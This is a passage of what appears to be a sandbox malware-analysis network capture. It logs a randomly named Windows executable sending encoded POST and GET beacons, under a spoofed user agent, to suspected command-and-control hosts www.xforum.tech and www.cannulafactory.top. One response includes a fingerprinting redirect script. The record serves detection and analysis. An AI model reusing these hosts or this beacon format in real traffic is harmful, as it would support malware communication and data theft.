                                        Sep 3, 2024 13:54:50.599862099 CEST1236INData Raw: 34 38 2e 32 33 37 2d 2e 34 32 39 2d 2e 30 35 33 2d 2e 38 35 2d 2e 35 33 32 2d 2e 39 38 37 4d 32 31 2e 37 32 32 20 31 30 2e 31 30 31 63 2d 2e 34 38 34 2d 2e 32 38 2d 31 2e 31 36 2e 30 38 2d 31 2e 35 34 32 2e 33 37 38 2d 2e 35 37 2e 34 34 34 2d 2e
                                        Data Ascii: 48.237-.429-.053-.85-.532-.987M21.722 10.101c-.484-.28-1.16.08-1.542.378-.57.444-.957.924-1.152 1.628-.21.764.802 1.182 1.296.663.4-.42.901-.746 1.308-1.172.319-.334.594-1.205.09-1.497M23.513 15.078c-.385.414-.505 1.566-.513 2.381-.005.47.333.
                                        Sep 3, 2024 13:54:50.599874020 CEST1236INData Raw: 35 20 32 2e 35 32 38 2e 30 35 35 2e 35 31 2e 36 37 38 2e 36 36 34 2e 37 34 31 2e 30 38 2e 30 36 38 2d 2e 36 32 38 2e 34 32 2d 32 2e 34 30 35 2d 2e 33 30 36 2d 32 2e 36 30 38 4d 35 34 2e 38 30 33 20 31 36 2e 33 30 31 63 2d 2e 30 36 35 2d 2e 33 34
                                        Data Ascii: 5 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052 2.313.405 2.636.225.16.545-.077.512-.623-.024-.375-.13-.676-.195-1.027M39.534 21.024c-.423.212-.58 1
                                        Sep 3, 2024 13:54:50.599888086 CEST1236INData Raw: 35 30 33 20 31 2e 30 32 33 2e 37 38 2e 33 34 38 2e 33 30 31 20 31 2e 37 33 38 2e 37 38 38 20 31 2e 35 38 36 2d 2e 32 34 35 2d 2e 31 34 31 2d 2e 39 36 33 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38
                                        Data Ascii: 503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.02
                                        Sep 3, 2024 13:54:50.599900961 CEST1236INData Raw: 30 31 2e 30 39 36 2d 2e 30 30 31 2e 32 30 34 20 30 20 2e 32 39 37 20 30 20 2e 31 34 2d 2e 30 31 36 2e 32 39 34 2d 2e 30 32 35 2e 34 33 34 2d 2e 30 31 32 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35
                                        Data Ascii: 01.096-.001.204 0 .297 0 .14-.016.294-.025.434-.012.181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.
                                        Sep 3, 2024 13:54:50.599912882 CEST1236INData Raw: 33 35 2e 31 2d 2e 30 30 34 2e 32 37 2e 30 34 37 2e 35 33 33 2e 33 37 39 2e 36 36 35 2e 31 38 36 2e 30 37 33 2e 34 35 38 2e 30 32 2e 35 34 33 2d 2e 31 34 6c 2e 30 32 37 2d 2e 30 35 33 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30
                                        Data Ascii: 35.1-.004.27.047.533.379.665.186.073.458.02.543-.14l.027-.053c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716
                                        Sep 3, 2024 13:54:50.604759932 CEST1236INData Raw: 74 65 28 2d 39 30 20 31 35 37 20 31 33 29 20 6d 61 74 72 69 78 28 2d 31 20 30 20 30 20 31 20 36 2e 33 31 36 20 30 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 37 38 39 20 34 2e 36 33 32 4c
                                        Data Ascii: te(-90 157 13) matrix(-1 0 0 1 6.316 0)"/> <path d="M15.789 4.632L15.789 0" transform="rotate(-90 157 13)"/> </g> <g fill-rule="nonzero" stroke="#979797" stroke-linecap="round" stroke-width="1.8" class="


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.449758103.224.182.242806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:55.952208996 CEST740OUTPOST /647x/ HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.xforum.tech
                                        Referer: http://www.xforum.tech/647x/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 61 4b 50 6f 66 38 4a 34 42 58 74 61 72 73 2f 72 6a 39 51 50 4f 30 6e 74 64 38 6d 66 6a 30 66 4c 51 3d 3d
                                        Data Ascii: r8=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlaKPof8J4BXtars/rj9QPO0ntd8mfj0fLQ==
                                        Sep 3, 2024 13:54:56.563483000 CEST872INHTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:54:56 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364496.8828139; expires=Fri, 01-Sep-2034 11:54:56 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-encoding: gzip
                                        content-length: 577
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                        Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.449759103.224.182.242806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:58.497771025 CEST760OUTPOST /647x/ HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.xforum.tech
                                        Referer: http://www.xforum.tech/647x/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 51 55 77 61 31 53 53 67 4a 57 51 63 70 32 48 34 59 46 4b 32 4f 71 71 76 30 46 4b 6f 31 69 7a 44 59 3d
                                        Data Ascii: r8=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOQUwa1SSgJWQcp2H4YFK2Oqqv0FKo1izDY=
                                        Sep 3, 2024 13:54:59.110877991 CEST872INHTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:54:59 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364499.3792583; expires=Fri, 01-Sep-2034 11:54:59 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-encoding: gzip
                                        content-length: 577
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                        Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.449760103.224.182.242806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:01.054883957 CEST10842OUTPOST /647x/ HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.xforum.tech
                                        Referer: http://www.xforum.tech/647x/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 78 59 46 4f 38 4a 4a 6c 64 52 5a 56 7a 56 6a 51 72 6c 63 45 59 6b 6a 58 56 75 4f 71 50 77 56 65 49 78 6f 6c 7a 6d 31 5a 34 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 79 56 6a 67 44 4b 77 61 6c 4c 72 7a 58 6c 59 56 49 51 2f 68 6a 45 6e 6d 54 6f 56 45 79 73 72 64 79 6a 31 37 49 73 2f 64 69 6a 30 71 75 6e 42 30 6f 69 42 4d 42 51 51 44 68 50 39 73 68 57 4b 72 4a 61 6e 33 6e 58 30 49 39 32 62 45 53 65 6a 59 64 59 75 63 [TRUNCATED]
                                        Data Ascii: r8=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKtG6k0Qs8ZUKaGdO6vPHyNM7ay4+Fxp/fEVTAdt0mwVshDbktz3j08RVwECtOGESfczZ2FdKnmiyEswfVnZEk+fdEA+8tTvGMmXDs965pbxiOCTwfgygbobta6PhOZt6gXvbYwqnxYFO8JJldRZVzVjQrlcEYkjXVuOqPwVeIxolzm1Z4pICoy0eIoWh4bBwR1eSqY5pISK2MHRHMeyVjgDKwalLrzXlYVIQ/hjEnmToVEysrdyj17Is/dij0qunB0oiBMBQQDhP9shWKrJan3nX0I92bESejYdYucQ4t+s3OmFkVYXAEjs/nxJtj1p7ptZ0Wzpr5lLnxH+p+rZG6XEtTboffvSr86jXaCwvYQcmnDbP0LyP/RxR93LuJ9V8eitX37k7XXp245qu1X+IZvQ5gm24SNsbSKJ8TwZrq0PW4A93BjO4Y/ezn4eIHdgyAZijHUzK5tNMSm9G3OTs4CAyK2E8vz0933E5HJVr1al54pe2aQHJfqPT4l8Lib3x7h/N6Q3HHNhrmcH8RV+fY7MHqscnPvgl9jKLycTZBvC0ntgoo/OIDJaJKhviWuZBW10cA/vLthZ0GjpsfXfc6Yzr9I9dGcKsju2yMCOmFcS/tIZvdkxo7OiZ1130spMtmdjGQNmYdi/sh7HdIa/V4bR1cMDRa6C8J+pWo2S5LsC/tlgSOfbdFvceGnphd05XlHkjoaIksFzFP7e8Ui9fMoHcbYrunu/hwLEPcP0cRXCb16E4mJnmKM6ERyTfvX19MyKoD+8oUdKRFzlE4OPMHVIS5gpyBh6KvAnzotNGLB3kdxasu4XZcjwQ/QVRboTcGbfxUdFAaf+etGALg9FwxJGUqSTTiP5dFX1CiWd4ODV4EWQ4q0eri84WVr996UjGgbohekmofAVfMwbzUvTZpDDgf7AenwKbqBqLZJng4THAoIKx0ch3FaTQefwugJOKh2nJEt1y [TRUNCATED]
                                        Sep 3, 2024 13:55:01.786588907 CEST872INHTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:55:01 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364501.8386285; expires=Fri, 01-Sep-2034 11:55:01 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-encoding: gzip
                                        content-length: 577
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                                        Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.449761103.224.182.242806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:03.610995054 CEST481OUTGET /647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s= HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:04.188083887 CEST1236INHTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:55:04 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364504.4310007; expires=Fri, 01-Sep-2034 11:55:04 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-length: 1476
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 56 5a 3d 71 7a 77 4c 55 4a 33 58 62 62 32 38 26 72 38 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 69 77 6d 50 36 6c 45 75 61 59 72 4e 79 39 78 66 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 68 30 50 59 70 4f 47 75 73 52 67 42 54 43 74 69 30 2b 47 71 52 66 39 4e 59 45 4a 33 4d 33 6e 49 67 33 73 3d 26 [TRUNCATED]
                                        Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" tex
                                        Sep 3, 2024 13:55:04.188101053 CEST512INData Raw: 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 56 5a 3d
                                        Data Ascii: t="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&fp=-3'>Click here to ent


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.44976218.183.3.45806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:09.398015022 CEST761OUTPOST /l90v/ HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.cannulafactory.top
                                        Referer: http://www.cannulafactory.top/l90v/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 55 63 67 44 35 52 6d 37 6d 4b 2b 30 64 56 34 66 58 65 39 6c 47 33 65 43 77 35 48 45 76 6a 6c 53 51 3d 3d
                                        Data Ascii: r8=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavUcgD5Rm7mK+0dV4fXe9lG3eCw5HEvjlSQ==
                                        Sep 3, 2024 13:55:10.269903898 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:10 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
